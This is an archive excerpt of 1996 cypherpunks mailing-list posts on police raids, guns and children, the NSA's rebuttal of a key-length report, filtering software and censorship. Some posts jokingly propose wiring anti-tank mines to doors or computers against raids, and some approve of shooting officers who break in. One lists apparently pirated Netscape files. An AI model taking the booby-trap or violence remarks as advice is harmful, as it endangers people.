> Tata.
> 
>                                                     Jim Choate
> 
> Forwarded message:
> 
> > Subject: Re: Mail-order Ph.D.'s
> > From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
> > Date: Fri, 19 Jul 96 07:37:24 EDT
> > 
> > He also invented the radio, but Marconi+Popov stole the credit from him.
> 
> 

You are gravely mistaken. Radio was invented by *Dr.* David Sternlight, Ph.D.
(Both AM and FM.)

E-cash, ecash, and e*cash are registered trademarks of *Dr.* David Sternlight,
Ph.D., Ph.D., Ph.D., patent pending, all rights reserved in perpetuity.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Sat, 20 Jul 1996 18:58:44 +0800
To: snow@smoke.suba.com (snow)
Subject: Re: Responding to Pre-dawn Unannounced Ninja Raids
In-Reply-To: <Pine.LNX.3.93.960719015510.1133G-100000@smoke.suba.com>
Message-ID: <199607192049.PAA31477@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


> 
>      I may be a little nuts, but does it strike anyone else that a good 
> self defense weapon against ninja raids would be a hand gernade? 
> 

Maybe not even a little:)

I suggest wiring an anti-tank mine to your door every night. If 
ninjas break in, everyone goes to hell. No need to wake up and be
alert in sleep -- all will be done automatically. So before that
ninja raid you will sleep better.

Or you can have a minefield in your backyard.

ObCrypto: how about putting an [anti-tank] mine inside your computer.
When ninjas try to get to your files, the computer and [depending on
your bloodthirstiness and load of explosives] ninjas will get
destructed. Has anyone ever done that?

Have phun,

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Douglas B. Renner" <dougr@skypoint-gw.globelle.com>
Date: Sat, 20 Jul 1996 19:42:14 +0800
To: Jerome Tan <jti@i-manila.com.ph>
Subject: Re: Home Made Telephone Voice Changer
In-Reply-To: <01BB752B.7FF7A440@ip65.i-manila.com.ph>
Message-ID: <Pine.3.89.9607191514.B2477-0100000@skypoint-gw.globelle.com>
MIME-Version: 1.0
Content-Type: text/plain




On Wed, 17 Jul 1996, Jerome Tan wrote:

> Does anyone know how to make a home-made telephone voice changer?

While I haven't tried this particular kludge, taking a VSC equipped tape
player (Radio Shack used to sell these, and may still) inserting an 
automotive cassette-stereo CD adapter (the inductive coupling kind that 
are built into cassette shells) and driving that with a cheap mike & low 
power audio amp ... should enable you to lower your voice pitch 
substantially.

Have fun,
-Doug





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 20 Jul 1996 10:02:38 +0800
To: cypherpunks@toad.com
Subject: Re: take the pledge
In-Reply-To: <199607191606.MAA04690@jekyll.piermont.com>
Message-ID: <e2wBRD3w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"Perry E. Metzger" <perry@piermont.com> writes:
> I'd like to ask people to publically pledge that they will not reply
> to David's messages. This is such a pledge.


I've already said this before, but I'll say it again: *Dr.* David Sternlight
is an asshole and I pledge not to reply to his messages.

Can we talk cryptography now?

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 20 Jul 1996 19:03:28 +0800
To: cypherpunks@toad.com
Subject: Re: Reverse Engineer
In-Reply-To: <199607191530.LAA13859@apollo.gti.net>
Message-ID: <46wBRD4w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Mark Rogaski <wendigo@pobox.com> writes:
> : What do you mean by "reverse engineer?" I have heard this word several =
> : times especially in the world of hacking, but... can someone tell me =
> : what it really meant?
> : 
> 
> Reverse engineering is the process of taking a piece of executable code,
> be it a Win95 program or firmware for a cellular phone eeprom, and
> running it through a disassembler.  The disassembler converts the
> machine code into assembly instructions.  From there, a person with
> a lot of spare time, a good understanding of compiler design, and a lot
> of caffeine can translate the assembly instructions into a higher level
> language (ie. C, C++, VisualBasic).  The first part is easy (and writing
> a disassembler is a good project for upper-level Comp Sci courses), but
> the second part is a real bear and people with the knowledge and 
> drive to do it have my respect.

Small correction: oftentimes one is trying to figure out the 'secret' 
algorithm used by the program, and that can be done by analyzing the
assembler just as well. I did this a few times to break 'secret'
cryptosystems. 

Certain programs encrypt their executable code and decrypt it at runtime
to make reverse engineering more difficult.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ernest Hua <hua@xenon.chromatic.com>
Date: Sat, 20 Jul 1996 13:18:07 +0800
To: Jonathon Blake <grafolog@netcom.com>
Subject: Re: Giving 6 year old kids Uzi's (Was: Responding to Pre-dawn Unannounced Ninja Raids)
In-Reply-To: <Pine.SUN.3.95.960719221429.4919D-100000@netcom7>
Message-ID: <199607192255.PAA24351@server1.chromatic.com>
MIME-Version: 1.0
Content-Type: text/plain



> > Just why do you suppose a pissed-off six-year-old (because, let's say,
> > another six-year-old stole his lunch) would not blast someone?
> 
> I can only assume that
> #1:	You've never lived where both long arms, and side 
> 	arms were a part of normal casual dress attire. 
> #2:	You have no comprehension of non-wasp culture norms.

Before you make some irresponsible accusations, please investigate
the facts.  I grew up in both Western-style and backward country
Taiwan.  Neither required side arms, and we did fine.  Neither are
what you might consider "wasp".  And I certainly would not want
your own childhood distortions to become the social norm.  I am
sure they killed and lynched many Asians "in the good ol' days".
I'm not for those days.

The point is, you would not give a gun to someone with mental
disorders.  Right?  (If you would, then we might as well just stop
the conversation here.)  The reason you would not is because there
is a "significant" chance that this person would not respect basic
social values like life, liberty, etc ...

If I remember correctly, there were MANY times when, if I had a
weapon capable of killing someone near invisibly (say a poison
dart), I just might have used it.  Of course, as an adult I would
live to regret having the ability and resources to following
through on a fit of childhood rage.

When your BIG goal is to get to 16.5 so you can a learner's permit,
you just don't have a well-balanced view of the world yet.  In
addition, when you don't have a family, when you don't have buy-in
of ANY SORT into your community, when you have ZERO future (as in
the lives of some inner city kids), you simply do not care about
these other concepts like brotherhood and community.

I have always argued that those who have vesting in a community
will work harder to make that community great.  The same principle
applies to companies where the employees get profit sharing or own
significant stock.  If you HAVE to care because it would benefit
you to care, YOU WILL.  If you don't have to care, YOU WON'T.

A 6 (or 12 or 18) year old, simply does not have to care.  I can
bribe my 2 year old with one simple thing:  Sweets.  He is vested
in his immediate futures in cookies and ice cream.  Beyond that, he
has nothing vested whatsoever (mostly because he just isn't aware
of anything serious yet).

As a stereotypical geek at 12, at 18, at 24 and now at 30, I am
still not completely sure I am mature enough that I would trust
my own judgements with a gun.  And I have had the fortune of a
reasonably good, well-educated, upper-middle-class life.  I would
hate to see what would have happened if I grew up in a gheto.

Ern






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Sat, 20 Jul 1996 10:08:50 +0800
To: Sandy Sandfort <ceridwyn@wolfenet.com>
Subject: Re: Responding to Pre-dawn Unannounced Ninja Raids
Message-ID: <2.2.32.19960719195905.008675d0@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:19 AM 7/19/96 -0700, Sandy Sandfort wrote:
>> >[In California] anyone found in your house at night is
>> >presumptively a threat to which you may respond with deadly 
>> >force.  Shoot on sight, in other words.
>
>To which Cerridwyn responded:
> 
>> I find it hard to believe "anyone".  If "anyone" happens to be
>> law enforcement, as has been proven again and again: yer screwed
>> no matter what (either dead or in jail forever). 
>
>Hard to believe or not, that's the presumption.  Now in law,
>it's a rebuttable presumption, but it's still a get-out-of-jail
>card if you did not know the shadow at the end of the call was 
>a cop who was LAWFULLY in your house. 

In this regard, I called into a local (NYC) National Commie Radio talk show
(Brian Lehrer's) last year and was talking with the host about G. Gordon
Liddy's remarks on shooting federal agents who unlawfully break into your
hose.  I said that self defense *could* (not necessarily *would*) work as a
defense to a murder charge involving the killing of federal agents in this
circumstance.  He asked me if I could come up with any examples from real
life where this had worked and I immediately shot back with "Yeah, Randy
Weaver and Kevin Harris."  That was the so-called Ruby Ridge case.  They
were acquitted of murder.

Then there was the guy in New York who shot six NYC cops who surrounded the
apartment where he was hiding (none died).  He was acquitted of assault and
attempted murder charges because he argued that he thought the cops had been
sent to kill him by the drug dealers that it was his profession to rob.
Love those NYC juries.  And they say that there's no justice for a black man
in Amerikkka.

Don't try this at home though kids.  Better to be elsewhere when they come
looking for you.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ernest Hua <hua@xenon.chromatic.com>
Date: Sat, 20 Jul 1996 12:47:38 +0800
To: mpd@netcom.com (Mike Duvos)
Subject: Re: Filtering out Queers is OK
In-Reply-To: <199607190748.AAA08518@netcom2.netcom.com>
Message-ID: <199607192315.QAA24402@server1.chromatic.com>
MIME-Version: 1.0
Content-Type: text/plain



> The problem with giving parents the absolute right to control
> their childrens' input of memes until the children are too old
> and stupid to learn anything new, is that it creates generational
> propagation of obsolete ideologies.  All the Dole children think
> exactly like Bob.  All the Hitler children think exactly like
> Adolf.  Same for the Mengele children, the Nixon children, the
> Stalin children, the Netanyahu children, etc...

The same can be said of the children of the more politically
correct.  My opinion is that religion is a waste of time and
resources, and therefore, those who force their children to
be religious is doing precisely the same harm you allude to.

That is strictly MY opinion.  If there are enough of me
around, should we be allowed to force the government to take
children away from their religious parents?  More mildly, can
the government "protect" a child from religious ideas?

What gives the society more rights to regulate how the child
shall be brought up, except the narrow interest of protecting
the physical safety of the child?  It is not even clear that
the government may force a child to accept secular ideas that
may violate the child's religious background, even if the
government has a compelling secular interest in doing so.

Yes, we would like fewer Hitler's in the future.  But should
we NOT let the people decide how the raise their children
because there is some risk of a few of them turning into
future Hitlers?

Ern






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Sat, 20 Jul 1996 22:00:03 +0800
To: cypherpunks@toad.com
Subject: MON_dex
Message-ID: <199607191621.QAA20445@pipe5.t1.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


A business wire of 7-18-96 reports at length on the massive globalization
of Mondex, of which the new AT&T/Wells Fargo Ecash card is a part. It does
not answer DCF's lost wallet questions. 
 
 
----- 
 
 
http://pwp.usa.pipeline.com/~jya/mondex.txt  (12 kb) 
 
 
MON_dex




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Sat, 20 Jul 1996 19:10:59 +0800
To: Vinnie Moscaritolo <vinnie@webstuff.apple.com>
Subject: Re: Responding to Pre-dawn Unannounced Ninja Raids
In-Reply-To: <v03007601ae14b98f81fd@[17.203.21.77]>
Message-ID: <Pine.BSF.3.91.960719162359.13089C-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 18 Jul 1996, Vinnie Moscaritolo wrote:
> 
> Fighting back through firepower is unlikely to acheive the goal you want,
> It endangers innocent (if there are any left) folks and leaves you looking
> like a HCI poster child. I can see it now, "Crazed Naked Hippy Dies in
> battle with Federal Officers, linked to ITAR regulated Munitions factory".
> 
> A better approach is to disarm and expose these bozos for what they are,
> and for christ sakes get out there and VOTE... dammit... and get your
> friends to VOTE..
> 

My community had an accidental Ninja raid on the wrong house a year or so
back; the local yokels inadvertantly raided the home of a secret service
agent. Luckily, the agent was away, and only the wife and kids were home. 
Nobody started a firefight and nobody died. A lot of people ended up
looking like bozos, especially the local swat team in their
ninja-bunny-suits with no visable police i.d. whatsoever. The community
outrage likely did more for personal freedom than a dead nekid hippie
martyr armed with an HK could have ... 

- r.w.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ernest Hua <hua@xenon.chromatic.com>
Date: Sat, 20 Jul 1996 11:23:54 +0800
To: harka@nycmetro.com
Subject: Re: Responding to Pre-daw
In-Reply-To: <TCPSMTP.16.7.19.-13.18.40.2780269260.1198984@nycmetro.com>
Message-ID: <199607192338.QAA24445@server1.chromatic.com>
MIME-Version: 1.0
Content-Type: text/plain



> > > Except that getting killed in a traffic accident IS an accident (mostly :)
> > > while having black clad Fed's storming into your house was _consciously_
> > > decided by them, because THEY have a problem with YOUR guns (?!)...
> >
> > I think the original point was that they MIGHT storm into your house
> > by mistake (say, because they incorrectly accepted a informant's
> > story). Therefore, it is truly a mistake.
> 
> Well, not really. It would be severe case of neglegence which is not the
> same as a mistake. When you drive, you have to prove that you know what
> you are doing by getting a driver's licence.

Uh ... I think you missed the point of my mail.  I think I explained it
later on, but here it is in different words.  It may be clearer this time.

> If you are a SWAT guy and some informer would come along and say "This
> and that person is a terrorist, I know for sure" and you go into that
> house and shoot everything that moves, well, doesn't sound much like an
> accident to me...

I think it would be unfortunate if you think that SWAT team members are
trained to storm in and shoot anything that moves.  They are trained to
provide protection to themselves while attempting to apprehend the
target.  That, to you, may be a subtle difference, but it make a big
difference to me:

1.  In your interpretation, they literally rampage through the target
    site without much regard for the destruction they may cause.

2.  In my interpretation, they are trying their best to balance the
    need to quickly apprehend the target, with the serious potential of
    being harmed in the process.

In circumstances where there is beyond a shadow of a doubt that the
target is criminal, then I would support their actions fully.  But
it is clear that mistakes have been made in the past.  The tragic
consequences of those mistakes are unforgivable.  Therefore, the
mistakes MUST be prevented.

That said, I think, in most cases (and I believe most LE believe
this too), there does not need to be a violent conflict.

I believe they can choose a different scenario.  They do not have to
choose a scenario where they have to be in immediate danger.  The
recent Montana standoff is an example where government agents did
NOT choose to storm in (good or bad decision is another debate).

It is not unreasonable to be scared into doing irrational things if
someone storms into your house at 4am.  However, if you get a phone
call saying your house is surrounded, you might have more time to
think straight and realize that there is some horrible mistake.

And, as far as I know, it is perfectly legal to be a little paranoid.

Ern






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 20 Jul 1996 13:37:21 +0800
To: Duncan Frissell <cypherpunks@toad.com
Subject: Re: Kellstrom Calls for DT Funding
Message-ID: <199607200001.RAA13302@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:33 PM 7/19/96 -0400, Duncan Frissell wrote:
>In a "briefing" on TWA 800 when one of the reporters tossed Big Jim
>Kellstrom (Deputy Director in Charge of the New York Office) of the FBI a
>softball question about what he needed to fight terrorism; he took the
>opportunity to call for full funding of the Digital Telephony Bill.  He said
>the usual about how bad guys conspire and we need to tap.


Too bad these people aren't required to show specific examples where the 
"bad guys" got away as a result of their failure to be able to do wiretaps.

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Sat, 20 Jul 1996 20:11:55 +0800
To: cypherpunks@toad.com
Subject: Re: Filtering out Queers is OK
In-Reply-To: <v03007613ae15b757c962@[192.187.162.15]>
Message-ID: <199607200000.RAA10799@netcom11.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Ernest Hua <hua@chromatic.com> writes:

 > The same can be said of the children of the more politically
 > correct.  My opinion is that religion is a waste of time and
 > resources, and therefore, those who force their children to
 > be religious is doing precisely the same harm you allude to.

Of course they are.

 > That is strictly MY opinion.  If there are enough of me
 > around, should we be allowed to force the government to take
 > children away from their religious parents?  More mildly,
 > can the government "protect" a child from religious ideas?

 > What gives the society more rights to regulate how the child
 > shall be brought up, except the narrow interest of
 > protecting the physical safety of the child?  It is not even
 > clear that the government may force a child to accept
 > secular ideas that may violate the child's religious
 > background, even if the government has a compelling secular
 > interest in doing so.

This is the usual smokescreen the "parents rights" lobby brings
to the bargaining table.  Rather than make the debate over the
rights of the child, and what resources the state should make
available to the child to protect those rights, they make it a
contest between the parent and the state to see who gets to
violate the child's rights the most.  Since most people regard
parents as more benevolent than the state towards children, the
parents automatically win without the reasonableness of their
behavior ever coming under discussion.

So instead of arguing whether children should have access to
education, libraries, computers, and other resources in their own
right, we get the usual endless debate over whether the state or
the parent should exercise the absolute iron-fisted control
parents all seem to think is such a wonderful thing, with
anything other than state collaboration with the parents wishes
being represented as the state usurping the parental role.

Been there.  Done that.  And as the Scottish would say, "It's
Crap."

 > Yes, we would like fewer Hitler's in the future.  But should
 > we NOT let the people decide how the raise their children
 > because there is some risk of a few of them turning into
 > future Hitlers?

Again, children have a right to go to libraries, get educated,
and use telecommunications resources without interference by
EITHER the state or their parents.  As is usual, the people who
are against children having these rights try to sell everyone the
notion that the only choice is between their two handpicked and
equally unacceptable alternatives - iron-fisted state control or
iron-fisted parental control of everything children do.

We see the same rhetoric at work with things like curfew laws as
well.  The question is always phrased as "should the state or the
parents set curfews." Whereas, the real question is "Should
police or parents have the right to harrass a 17 year old who is
out in public, behaving himself, simply because it is 9 PM at
night?"

The best way to raise "Fewer Hitlers" is to have a generation of
children who lack the internalized rage produced by being walked
on like doormats by numerous authority figures while they are
growing up.  This includes both parents and representatives of
the government.

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 20 Jul 1996 14:13:11 +0800
To: cypherpunks@toad.com
Subject: Re: Singapore officials censor U.S. newgroup posting
Message-ID: <199607200006.RAA13627@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:00 PM 7/19/96 -0500, Declan McCullagh wrote:
>This move by Singapore to censor a newsgroup posting is a good example of
>the overbreadth of government censorship. It's a bait-and-switch maneuver:
>say you're going after porn but censor "offensive" speech.

>The regulations ban contents that "tend to bring the Government into hatred
>or contempt," 


Isn't it too bad governments don't ban THEIR OWN actions  which "tend to 
bring the Government into hatred or contempt"?  After all, I think behind 
every example of "hatred or contempt" for government, you'll find an act by 
government which caused it.

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@crypto.com>
Date: Sat, 20 Jul 1996 13:31:15 +0800
To: Ernest Hua <hua@xenon.chromatic.com>
Subject: Re: NSA response to key length report
In-Reply-To: <199607190716.AAA20359@server1.chromatic.com>
Message-ID: <199607192110.RAA07548@crypto.com>
MIME-Version: 1.0
Content-Type: text/plain


Ernest Hua <hua@xenon.chromatic.com> writes:
> 
> It sounds like most of their "counter-arguments" are just stalling tactics.
> 
> If you are a lawyer for someone you know is guilty, you still would choose
> to find every reason in the book to attack the prosecution's case.  Here we
> have precisely the same effect with the NSA.  Any tactical manuveur to keep
> stalling the impending collapse of ITAR.
> 
> (It is human .. er .. rather .. bureaucrat-esque to claim innocence in the
> face of overwhelming evidence of guilt.)

Particularly impressive is that our key length report was hardly
above criticism from several angles, but their rebuttal managed 
somehow to avoid them.

What I find most disturbing about this is that their report was
provided secretly to policymakers in the administration and in
Congress, without independent technical review that would have
quickly exposed the fallacy of the arguments.  I never would have
seen it had several of the recipients not faxed it to me.  This is
the first hard evidence I've seen of NSA providing anything less
than the highest quality technical analysis to other parts of the
government.  A non-specialist reader would be easily misled by the
technically dense, but completely irrelevant, "rebuttal".  It smacks 
of either ill-informed sloppiness, or, perhaps worse, self-serving  
disingenuous cynicism.  Either conclusion is scary, and, to me in
fact, quite surprising.

-matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: vacuo <vacuo@nemesis.meaning.com>
Date: Sat, 20 Jul 1996 12:01:56 +0800
To: cypherpunks@toad.com
Subject: Re: NSA response to key length report
Message-ID: <199607200016.RAA24381@black.colossus.net>
MIME-Version: 1.0
Content-Type: text/plain


In message <199607192110.RAA07548@crypto.com>
Matt Blaze <mab@crypto.com> writes:

> Particularly impressive is that our key length report was hardly
> above criticism from several angles, but their rebuttal managed 
> somehow to avoid them.
> 
> What I find most disturbing about this is that their report was
> provided secretly to policymakers in the administration and in
> Congress, without independent technical review that would have
> quickly exposed the fallacy of the arguments.  I never would have
> seen it had several of the recipients not faxed it to me.  This is
> the first hard evidence I've seen of NSA providing anything less
> than the highest quality technical analysis to other parts of the
> government.  A non-specialist reader would be easily misled by the
> technically dense, but completely irrelevant, "rebuttal".  It smacks 
> of either ill-informed sloppiness, or, perhaps worse, self-serving  
> disingenuous cynicism.  Either conclusion is scary, and, to me in
> fact, quite surprising.


It is only surprising because you are a naive fool. The NSA will
stop at nothing to control us and you are just helping by allowing
yourself to be playing by their own rules and will set yourself up for
them to use as an example to the rest of us when they get your ass.

Don't be an idiot - wake up and LOOK. Read puzzle palace. We can't win
on there terms. They aren't playing fair and we shouldn't either.




















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ernest Hua <hua@xenon.chromatic.com>
Date: Sat, 20 Jul 1996 19:30:04 +0800
To: Matt Blaze <mab@crypto.com>
Subject: Bureaucractic Slime Factor (Was: NSA response to key length report)
In-Reply-To: <199607192110.RAA07548@crypto.com>
Message-ID: <199607200018.RAA24698@server1.chromatic.com>
MIME-Version: 1.0
Content-Type: text/plain



> What I find most disturbing about this is that their report was
> provided secretly to policymakers in the administration and in
> Congress, without independent technical review that would have
> quickly exposed the fallacy of the arguments.  I never would have
> seen it had several of the recipients not faxed it to me.  This is

Yes.  This is the bureaucratic slime factor.  It pissed me off when
Freeh lobbied behind the scenes for Digital Telephony.  It pissed me
off when government officials use effectively hidden channels
precisely because they know they cannot get away with it in the full
light of public scrutiny.

Another way B.S.F. shows up is exemplified by gross mistatements
like Gore's recent "emerging consensus" claim.  It's the old "it's
technically true but we know damn well we are effectively lying to
the public" trick.

I am actually kind of surprised that there are some on this list
who might have considered giving Gore the benefit of the doubt.

Ern






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sat, 20 Jul 1996 12:48:33 +0800
To: junger@pdj2-ra.F-REMOTE.CWRU.Edu
Subject: Re: MSNBC and cookies
Message-ID: <01I79JPZV1F49EDBND@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"junger@pdj2-ra.F-REMOTE.CWRU.Edu"  "Peter D. Junger" 19-JUL-1996 13:57:57.15

>It's a nuisance, but I suppose there is no reason that a commercial
>service can't do such a thing.  But what happens when one tries to
>access it with Lynx?

	At least with VAX/VMS Lynx (I assume the other version would be doing
the same thing), you get stopped at "Welcome to MSNBC [IMAGE]". Both links
lead to the same page, namely the one you're already on.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Sat, 20 Jul 1996 15:15:24 +0800
To: Troy Denkinger <troy_d@ix.netcom.com>
Subject: Re: Filtering out Queers is OK
In-Reply-To: <2.2.32.19960719154550.0073d960@popd.ix.netcom.com>
Message-ID: <Pine.LNX.3.94.960719171450.359A-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Fri, 19 Jul 1996, Troy Denkinger wrote:

> We have an interesting problem here, though.  You say that the government
> has no right to tell you how to set your filter; no doubt about that, imo.
> However, most people who use these filters are going to be quite happy to
> allow some corporate entity the privilege of setting their filters for them
> and, if the consumer should ask about criteria and such, they are told that
> that's a trade secret.  So, people will be allowing a corporate entity that
> exists for profit to set their filters for them.  This is a very scary thing
> and perhaps even more frightening than having the government do it.  I think
> that the people on this list tend to maintain a healthy scepticism toward
> the various TLAs, but we have to remember that a large, multinational
> corporation has not even got a sense of a greater "national good" or even
> "national security" to guide it.

However, parents are free not to purchase filtering software that claims that
their criteria is a trade secret.  I don't see this as a threat at all.  The
parents who refuse to buy this software don't have to worry about the filtering
software preventing little Johnny from visiting a site that has information
on homosexuality or subscribing to a computer science mailing list (which are
apparently blocked by some filtering software for some reason).

- -- Mark

PGP encrypted mail prefered
Key fingerprint = d61734f2800486ae6f79bfeb70f95348
http://www.voicenet.com/~markm/  


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQCVAwUBMe/8b7Zc+sv5siulAQGerAP+IWpgJ6hpbKOZcs1TPZwYLIqQLG+LccPD
nOMKVKmgMndzywuqO1lg59+VX2cA2qODwQ6SjQQ+gG2eImD6nPsPpD8Q/7D1hlHW
JhpPjp2UFt/xL3FtYG9/g2/4mYHx7Z0xVl51BNPHDiBMnyaskTzdk0yV2Tpo2T/8
EovM30/Lx2Q=
=qGzJ
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Sat, 20 Jul 1996 13:44:02 +0800
To: Ernest Hua <hua@xenon.chromatic.com>
Subject: Re: Giving 6 year old kids Uzi's (Was: Responding to Pre-dawn Unannounced Ninja Raids)
In-Reply-To: <199607192139.OAA23712@server1.chromatic.com>
Message-ID: <Pine.SUN.3.91.960719165151.22708A-100000@crl8.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Fri, 19 Jul 1996, Ernest Hua wrote:

> I suspect you might be baiting ... but ...
> 
> If you can trust a six-year-old with an Uzi, I assume that you believe
> the six-year-old can "properly" judge what is a threat and what isn't?
> Just why do you suppose a pissed-off six-year-old (because, let's say,
> another six-year-old stole his lunch) would not blast someone?

Works for me.  Throughout most of the history of the US, children
have routinely been intrusted with deadly weapons--rifles, pistols
and shotguns.  I got my first real gun when I was seven or eight.
(Before that, I had a BB gun as long as I can remember.)  I gave 
my daugher one when she was nine or ten.  I know of one FOUR YEAR 
OLD whose parents gave her a gun.  (I have no doubt she would use 
it far more judiciously than your average cop.)  

For two hundred years Americans have been able to buy small
guns made especially for children.  I've seen them and they
were beautiful little guns.  Nowadays, the gun manufacturers
has eschewed them--probably for PR reasons.

> Would you just hand out guns to all teenagers?

Hell no!  Let them or their parents buy them.
 
> You might have had a different childhood, but when I (and most of my
> friends) were 6 (or 12 or even 18), our primary concern was having fun,

Ditto, bro.  And guns are great fun.  That's why Thomas Jefferson
opined that giving a young man a gun would do far more to build
his character then engaging in sports.  (I agree.)  Next time you
are in the San Francisco Bay Area, let me know and I'll take you
shooting.  Looks like you need some character building.  :-)

> This means that a group of 1000 KKK members will kill a group of 10
> blacks due to overwhelming force. 

Again, history shows you to be wrong.  Gun control started in
the antibellum South as a means to disarm the newly freed blacks.
When the Black Muslims bought a Southern plantation in the '60s
they were harassed--until they armed themselves with AR-15s. 
After that, no more problems.  Finally, I know a lawyer who was
a Freedom Rider in the '60s.  Whenever they were confronted with
threats of force, they shot back.  Presto, off into the woods
shrank the cowardly Klansmen.  Other--unarmed--civil rights
workers ended up being encorporated into dams and land fills.

> One principle in the Constitution (which I personally respect
> very much) is that a majority should not force its views on a
> minority.

Me too.  That's what we gun owners are fighting to preserve.
 
> Incidentally, if you are interested, I DO have a child (almost 2 yrs),
> and I certainly would not even contemplate letting him have a gun (no
> matter how well he can use it) until he can legal get one himself.  I
> will certainly invoke serious wrath (on him and anyone else involved)
> if I ever found him with a gun.

Unfortunately, the first you might know of it is when he comes
across a gun and ends up shooting himself or someone else because 
of the gun ignorance to which you have condemned him.  Good luck.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Sat, 20 Jul 1996 14:21:58 +0800
To: cypherpunks@toad.com
Subject: Re: Netscape
In-Reply-To: <199607191626.SAA09380@basement.replay.com>
Message-ID: <Pine.GUL.3.94.960719164240.14972B-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Fri, 19 Jul 1996, Anonymous wrote:

[on hacktic]
> netscape-fts2-hp10.tar.gz	Fast Track Server 2.0 for HPUX10
> netscape-fts2-nt.exe		Fast Track Server 2.0 for WinNT
> netscape-hpus-30b5.tar.gz	Navigator 3.0b5 for HP-UX
> netscape-linux-30b5.tar.gz	Navigator 3.0b5 for Linux
> netscape-ssl30-src.tar.gz	SSL 3.0 source code
> netscape32us-30b5.exe		Navigator 3.0b5 for Win95/NT

And thus it begins... I think it's a bad idea to provoke the TLAs like this,
but I suppose it's inevitable. (But doesn't anyone use Macs or Suns?)

Fight for the spin: "Since Netscape isn't allowed to sell its software
overseas, people are going to pirate it, thereby losing the US o' A both
technology and money." 

> By the way, is it possible to get a certificate for the
> Fast Track 128 bit servers outside of north america?

Why would you want one when the source for Apache-SSL is available? Besides,
it's a Serious Copyright Violation, said with minimal irony. This whole
thing isn't Netscape's fault; in fact, they're doing their best to be the
good guys. 

- -rich

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBVAwUBMfAfZZNcNyVVy0jxAQGCgQH9EH+19if1GlnbPW/RwRmMEC3N9lUnVb3v
EfDcMAyRa2xA9ud9JLmChVio9McBkE/8Hkvj0dj6IOpnVni+GjoX8Q==
=88i4
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jerome Tan <jti@i-manila.com.ph>
Date: Sat, 20 Jul 1996 15:27:32 +0800
To: "'cypherpunks@toad.com>
Subject: Firewall Penetration
